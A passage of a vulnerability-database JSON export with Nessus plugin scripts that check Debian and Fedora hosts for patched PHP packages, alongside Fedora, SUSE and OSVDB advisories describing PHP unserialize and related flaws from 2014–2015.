attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3117\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 5.4.36-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.36-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "18 Dec 2014, PHP 5.6.4\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68104 (Segfault while pre-evaluating a disabled function).\n(Laruence)\\\\r\\\\n* Fixed bug #68185 ('Inconsistent insteadof\ndefinition.'- incorrectly triggered). (Julien)\\\\r\\\\n* Fixed bug #68355\n(Inconsistency in example php.ini comments). (Chris McCafferty)\\\\r\\\\n*\nFixed bug #68370 ('unset($this)' can make the program crash).\n(Laruence)\\\\r\\\\n* Fixed bug #68422 (Incorrect argument reflection info\nfor array_multisort()). (Alexander Lisachenko)\\\\r\\\\n* Fixed bug #68446\n(Array constant not accepted for array parameter default). (Bob,\nDmitry)\\\\r\\\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nGMP:\\\\r\\\\n* Fixed bug\n#68419 (build error with gmp 4.1). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n*\nFixed possible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nSession:\\\\r\\\\n*\nFixed bug #68331 (Session custom storage callable functions not being\ncalled) (Yasuo Ohgaki)\\\\r\\\\n\\\\r\\\\nSOAP:\\\\r\\\\n* Fixed bug #68361\n(Segmentation fault on SoapClient::__getTypes).\n(Laruence)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n* Fixed bug #53829 (Compiling PHP\nwith large file support will replace function gzopen by gzopen64)\n(Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17241.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80291", "title": "Fedora 21 : php-5.6.4-2.fc21 (2014-17241)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17241.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80291);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17241\");\n\n script_name(english:\"Fedora 21 : php-5.6.4-2.fc21 (2014-17241)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.6.4\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68104 (Segfault while pre-evaluating a disabled function).\n(Laruence)\\\\r\\\\n* Fixed bug #68185 ('Inconsistent insteadof\ndefinition.'- incorrectly triggered). (Julien)\\\\r\\\\n* Fixed bug #68355\n(Inconsistency in example php.ini comments). (Chris McCafferty)\\\\r\\\\n*\nFixed bug #68370 ('unset($this)' can make the program crash).\n(Laruence)\\\\r\\\\n* Fixed bug #68422 (Incorrect argument reflection info\nfor array_multisort()). (Alexander Lisachenko)\\\\r\\\\n* Fixed bug #68446\n(Array constant not accepted for array parameter default). (Bob,\nDmitry)\\\\r\\\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nGMP:\\\\r\\\\n* Fixed bug\n#68419 (build error with gmp 4.1). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n*\nFixed possible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nSession:\\\\r\\\\n*\nFixed bug #68331 (Session custom storage callable functions not being\ncalled) (Yasuo Ohgaki)\\\\r\\\\n\\\\r\\\\nSOAP:\\\\r\\\\n* Fixed bug #68361\n(Segmentation fault on SoapClient::__getTypes).\n(Laruence)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n* Fixed bug #53829 (Compiling PHP\nwith large file support will replace function gzopen by gzopen64)\n(Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147131.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98b77dc7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.4-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "18 Dec 2014, PHP 5.5.20\\r\\n\\r\\nCore:\\r\\n* Fixed bug #68091 (Some Zend\nheaders lack appropriate extern 'C' blocks). (Adam)\\r\\n* Fixed bug\n#68185 ('Inconsistent insteadof definition.'- incorrectly triggered).\n(Julien)\\r\\n* Fixed bug #68370 ('unset($this)' can make the program\ncrash). (Laruence)\\r\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\r\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\r\\n\\r\\nDate:\\r\\n* Fixed day_of_week function as it could\nsometimes return negative values internally. (Derick)\\r\\n\\r\\nFPM:\\r\\n*\nFixed bug #68381 (fpm_unix_init_main ignores log_level). (David\nZuelke, Remi)\\r\\n* Fixed bug #68420 (listen=9000 listens to ipv6\nlocalhost instead of all addresses). (Remi)\\r\\n* Fixed bug #68421\n(access.format='%R' doesn't log ipv6 address). (Remi)\\r\\n* Fixed bug\n#68423 (PHP-FPM will no longer load all pools). (Remi)\\r\\n* Fixed bug\n#68428 (listen.allowed_clients is IPv4 only). (Remi)\\r\\n* Fixed bug\n#68452 (php-fpm man page is oudated). (Remi)\\r\\n* Fixed request #68458\n(Change pm.start_servers default warning to notice). (David Zuelke,\nRemi)\\r\\n* Fixed bug #68463 (listen.allowed_clients can silently\nresult in no allowed access). (Remi)\\r\\n* Fixed request #68391\n(php-fpm conf files loading order). (Florian Margaine, Remi)\\r\\n*\nFixed bug #68478 (access.log don't use prefix).\n(Remi)\\r\\n\\r\\nMcrypt:\\r\\n* Fixed possible read after end of buffer and\nuse after free. (Dmitry)\\r\\n\\r\\nPDO_pgsql:\\r\\n* Fixed bug #66584\n(Segmentation fault on statement deallocation) (Matteo)\\r\\n* Fixed bug\n#67462 (PDO_PGSQL::beginTransaction() wrongly throws exception when\nnot in transaction) (Matteo)\\r\\n* Fixed bug #68351 (PDO::PARAM_BOOL\nand ATTR_EMULATE_PREPARES misbehaving) (Matteo)\\r\\n\\r\\nzlib:\\r\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17276.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80296", "title": "Fedora 19 : php-5.5.20-2.fc19 (2014-17276)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17276.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80296);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17276\");\n\n script_name(english:\"Fedora 19 : php-5.5.20-2.fc19 (2014-17276)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.5.20\\r\\n\\r\\nCore:\\r\\n* Fixed bug #68091 (Some Zend\nheaders lack appropriate extern 'C' blocks). (Adam)\\r\\n* Fixed bug\n#68185 ('Inconsistent insteadof definition.'- incorrectly triggered).\n(Julien)\\r\\n* Fixed bug #68370 ('unset($this)' can make the program\ncrash). (Laruence)\\r\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\r\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\r\\n\\r\\nDate:\\r\\n* Fixed day_of_week function as it could\nsometimes return negative values internally. (Derick)\\r\\n\\r\\nFPM:\\r\\n*\nFixed bug #68381 (fpm_unix_init_main ignores log_level). (David\nZuelke, Remi)\\r\\n* Fixed bug #68420 (listen=9000 listens to ipv6\nlocalhost instead of all addresses). (Remi)\\r\\n* Fixed bug #68421\n(access.format='%R' doesn't log ipv6 address). (Remi)\\r\\n* Fixed bug\n#68423 (PHP-FPM will no longer load all pools). (Remi)\\r\\n* Fixed bug\n#68428 (listen.allowed_clients is IPv4 only). (Remi)\\r\\n* Fixed bug\n#68452 (php-fpm man page is oudated). (Remi)\\r\\n* Fixed request #68458\n(Change pm.start_servers default warning to notice). (David Zuelke,\nRemi)\\r\\n* Fixed bug #68463 (listen.allowed_clients can silently\nresult in no allowed access). (Remi)\\r\\n* Fixed request #68391\n(php-fpm conf files loading order). (Florian Margaine, Remi)\\r\\n*\nFixed bug #68478 (access.log don't use prefix).\n(Remi)\\r\\n\\r\\nMcrypt:\\r\\n* Fixed possible read after end of buffer and\nuse after free. (Dmitry)\\r\\n\\r\\nPDO_pgsql:\\r\\n* Fixed bug #66584\n(Segmentation fault on statement deallocation) (Matteo)\\r\\n* Fixed bug\n#67462 (PDO_PGSQL::beginTransaction() wrongly throws exception when\nnot in transaction) (Matteo)\\r\\n* Fixed bug #68351 (PDO::PARAM_BOOL\nand ATTR_EMULATE_PREPARES misbehaving) (Matteo)\\r\\n\\r\\nzlib:\\r\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147123.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f81a5b7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"php-5.5.20-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:42:02", "bulletinFamily": "unix", "description": "php5 was updated to fix four security issues.\n\n These security issues were fixed:\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x\n before 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-8142 (bnc#910659).\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component in PHP through\n 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used\n to read a .php file, did not properly consider the mapping's length\n during processing of an invalid file that begins with a # character and\n lacks a newline character, which caused an out-of-bounds read and might\n (1) allow remote attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a .php file or (2)\n trigger unexpected code execution if a valid PHP script is present in\n memory locations adjacent to the mapping (bnc#911664).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via crafted EXIF data\n in a JPEG image (bnc#914690).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x\n before 5.5.20, and 5.6.x before 5.6.4 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate keys within the serialized properties of\n an object, a different vulnerability than CVE-2004-1019 (bnc#910659).\n\n Additionally a fix was included that protects against a possible NULL\n pointer use (bnc#910659).\n\n This non-security issue was fixed:\n - php53 ignored default_socket_timeout on outgoing SSL connection\n (bnc#907519).\n\n", "modified": "2015-02-24T11:05:36", "published": "2015-02-24T11:05:36", "id": "SUSE-SU-2015:0365-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00029.html", "title": "Security update for php5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:56", "bulletinFamily": "unix", "description": "PHP is a well known, widely-used scripting language often used within web server setups.\n#### Solution\nThere is no workaround known besides disabling PHP. Therefore we recommend to install the updated packages.", "modified": "2005-01-17T17:12:32", "published": "2005-01-17T17:12:32", "id": "SUSE-SA:2005:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-01/msg00010.html", "title": "remote code execution in php4, mod_php4", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## Solution Description\nUpgrade to version 4.3.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_3_10.php\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory 